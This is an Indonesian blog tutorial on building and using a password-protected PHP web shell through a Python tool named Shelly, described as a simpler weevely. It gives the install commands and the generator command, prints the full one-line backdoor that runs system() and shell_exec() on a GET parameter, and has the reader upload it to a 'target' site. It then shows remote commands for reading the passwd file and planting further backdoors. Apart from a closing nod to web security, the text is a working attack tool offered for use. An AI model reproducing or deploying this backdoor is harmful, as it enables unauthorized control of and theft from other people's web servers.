Malam lurr… udah lama nih ga nulis tutorial di blog dikarenakan sibuk kuliah hehe. Pada kesempatan kali ini saya ingin menuliskan bagaiman cara meremote sebuah website menggunakan python, bisa dikatakan seperti weevely namun saya buat script sederhananya.
Ok langsung saja ke penjelasan, yang pertama kita install terlebih dahulu scriptnya
$ git clone https://github.com/tegal1337/Shelly
$ cd Shelly
Jangan lupa menginstall module python nya
$ sudo pip install -r requirements.txt
Sekarang ke tahap eksekusi, terlebih dahulu kita buat sebuah backdoornya sebagai pintu penghubung untuk meremote web target kita
$ python3 shell.py -g "namashel"l -p "password"
Apa isi dari backdoor tersebut ? Isinya adalah fungtion shell_exec(). Shell exec sendiri adalah fungsi bawaan PHP yang berfungsi untuk menjalankan perintah melalui shell dan mengembalikan output yang lengkap sebagai string. Output dari perintah atau hasil eksekusi akan bernilai NULL / Kosong jika terjadi kesalahan atau perintah tidak menghasilkan output.
<?php ($_GET['passwd'] == 'tegal1337') ? NULL : exit; system($_GET['c']); shell_exec($_GET['c']); ?>
Setelah membuat backdoor, selanjutnya kita upload pada web target kita. disini saya tidak akan menjelaskan bagaimana cara menguploadnya karena banyak sekali methode dan akan terlalu panjang jika dijelaskan. Saya anggap kita sudah menguploadnya saja.
Sekarang kita remote backdoornya dengan perintah
$ python3 shell.py -u "url_shell" -p tegal1337
Selanjutnya terserah kita, contoh melihat file config passwd
Membuat file backdoor baru :
Mungkin itu saja yang bisa saya jelaskan.. Semoga bermanfaat nantinya dalam memahami tentang pentingnya Web Security